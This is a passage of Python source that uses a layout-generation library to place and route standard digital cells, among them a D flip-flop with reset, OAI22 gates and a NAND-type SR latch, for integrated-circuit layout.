laygen.layers['metal'][4], i0_o_xy[0], i1_i_xy[0], 3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4) # iclk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4) # intermediate laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4) #pin if create_pin == True: laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][3], xy=i0_i_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1INV0', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1INV0', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff_rsth(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I" + objectname_pfix + 'INV0', "inv_" + str(m) + "x", pg, xy=origin) i1 = laygen.relplace(name = "I" + objectname_pfix + 'INV1', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i0.name) i2 = laygen.relplace(name = "I" + objectname_pfix + 'INV2', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i1.name) #rstb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV2'), gridname = pg)+ laygen.get_xy(obj = i1.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_rstbh(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False) org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0ND0'), gridname = pg)+ \ laygen.get_xy(obj = laygen.get_inst('I' + objectname_pfix + 'LCH0ND0').template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_rstbh(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, pin_o_y=5, create_pin=False) #internal coordinates i0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4) i0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) i1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4) i1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) i2_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4) i2_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4) ilch0_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH0TINV0', 'I', rg_m3m4) ilch0_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'B', rg_m3m4) ilch0_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'O', rg_m3m4) ilch1_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'I', rg_m3m4) ilch1_ck_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'EN', rg_m3m4) ilch1_ckb_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'ENB', rg_m3m4) ilch1_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'B', rg_m3m4) ilch1_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'O', rg_m3m4) # iclkb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i0_o_xy[0], i1_i_xy[0], 3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4) # iclk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4) # intermediate laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4) # rstb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i2_o_xy[0], ilch0_rstb_xy[0], 6, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i2_o_xy[0], ilch1_rstb_xy[0], 6, rg_m3m4) #pin if create_pin == True: laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][3], xy=i0_i_xy, gridname=rg_m3m4) laygen.pin(name='RST', layer=laygen.layers['pin'][3], xy=i2_i_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VDD', rg_m1m2) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VDD', rg_m1m2) #(fix this) rvss0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VSS', rg_m1m2) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VSS', rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_oai22_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_left, devname_nmos_body_right, devname_pmos_boundary, devname_pmos_body_2stack, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_left, gridname = pg, refinstname = in0.name) in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body_left, gridname = pg, refinstname = in4.name) in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_right, gridname = pg, refinstname = in5.name) in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip3.name, transform='MX') ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip4.name, transform='MX') ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5.name, transform='MX') # route # A laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") ra0 = laygen.route("R"+objectname_pfix+"A0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # B laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in2.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") rb0 = laygen.route("R"+objectname_pfix+"B0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # C laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") rc0 = laygen.route("R"+objectname_pfix+"C0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3) # D laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip5.name, refpinname0='G1', refinstname1=ip5.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") rd0 = laygen.route("R"+objectname_pfix+"D0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m2m3) # PDN-internal laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='S0', refinstname1=in6.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) # PUP-internal laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) # output ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_d0 * np.array([1, 0]), xy1=xy_d0, gridname0=rg_m1m2, refinstname0=in2.name, refinstname1=in2.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip5.name, refinstname1=ip5.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_d0 * np.array([1, 0]), refinstname=in2.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip5.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in1.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip7.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in7.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'C', 'D', 'O'], rect_list=[ra0, rb0, rc0, rd0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_oai22_skewed_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_left, devname_nmos_body_right, devname_nmos_space, devname_pmos_boundary, devname_pmos_body_2stack, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_left, gridname = pg, refinstname = in0.name) in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body_left, gridname = pg, refinstname = in4.name) in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_right, gridname = pg, refinstname = in5.name) in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name) in8 = laygen.relplace(name = "I"+objectname_pfix + 'N8', templatename = devname_nmos_space, gridname = pg, refinstname = in7.name, shape=np.array([4, 1])) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip3.name, transform='MX') ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip4.name, transform='MX') ip5a = laygen.relplace(name = "I"+objectname_pfix + 'P5a', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5.name, transform='MX') ip5b = laygen.relplace(name = "I"+objectname_pfix + 'P5b', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5a.name, transform='MX') ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip5b.name, transform='MX') ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip6.name, transform='MX') # route # A laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") ra0 = laygen.route("R"+objectname_pfix+"A0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # B laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in2.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") rb0 = laygen.route("R"+objectname_pfix+"B0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # C laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][1], xy0=np.array([6, 0]), xy1=np.array([6, 0]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([6, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([6, 0]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") rc0 = laygen.route("R"+objectname_pfix+"C0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3) # D laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([2, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=ip5.name, refpinname0='G1', refinstname1=ip5.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") rd0 = laygen.route("R"+objectname_pfix+"D0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m2m3) # PDN-internal laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='S0', refinstname1=in6.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) # PUP-internal laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) # output ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]]) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_d0 * np.array([1, 0]), xy1=xy_d0, gridname0=rg_m1m2, refinstname0=in2.name, refinstname1=in2.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip5.name, refinstname1=ip5.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0])+np.array([2,0]), xy1=xy_s0+np.array([2,0]), gridname0=rg_m1m2, refinstname0=ip6.name, refinstname1=ip6.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_d0 * np.array([1, 0]), refinstname=in2.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip5.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0])+np.array([2,0]), refinstname=ip6.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in1.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip7.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in7.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'C', 'D', 'O'], rect_list=[ra0, rb0, rc0, rd0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_ndsr(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=2, create_pin=False): """generate nand type SR latch""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I"+objectname_pfix + 'ND0', "nand_"+str(m)+"x", pg, xy=origin) i1 = laygen.relplace(name = "I"+objectname_pfix + 'ND1', templatename = "nand_"+str(m)+"x", gridname = pg, refinstname = i0.name) i2 = laygen.relplace(name = "I"+objectname_pfix + 'INV0', templatename = "inv_"+str(m)+"x", gridname = pg, refinstname = i1.name) i3 = laygen.relplace(name = "I"+objectname_pfix + 'INV1', templatename = "inv_"+str(m)+"x", gridname = pg, refinstname = i2.name) # internal pins nd0_a_xy = laygen.get_inst_pin_xy(i0.name, 'A', rg_m3m4) nd0_b_xy = laygen.get_inst_pin_xy(i0.name, 'B', rg_m3m4) nd0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) nd1_a_xy = laygen.get_inst_pin_xy(i1.name, 'A', rg_m3m4) nd1_b_xy = laygen.get_inst_pin_xy(i1.name, 'B', rg_m3m4) nd1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) buf0_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4) buf0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4) buf1_i_xy = laygen.get_inst_pin_xy(i3.name, 'I', rg_m3m4) buf1_o_xy = laygen.get_inst_pin_xy(i3.name, 'O', rg_m3m4) #route y0=nd0_a_xy[0][1] #Q_pre laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd0_o_xy[1], buf0_i_xy[0], y0+2, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd0_o_xy[1], nd1_b_xy[0], y0+2, rg_m3m4) #Qb_pre laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd1_o_xy[1], buf1_i_xy[0], y0+3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd1_o_xy[1], nd0_b_xy[0], y0+3, rg_m3m4) #pin if create_pin == True: laygen.pin(name='S', layer=laygen.layers['pin'][3], xy=nd0_a_xy, gridname=rg_m3m4) laygen.pin(name='R', layer=laygen.layers['pin'][3], xy=nd1_a_xy, gridname=rg_m3m4) laygen.pin(name='Q', layer=laygen.layers['pin'][3], xy=buf0_o_xy, gridname=rg_m3m4) laygen.pin(name='QB', layer=laygen.layers['pin'][3], xy=buf1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV1', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV1', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), 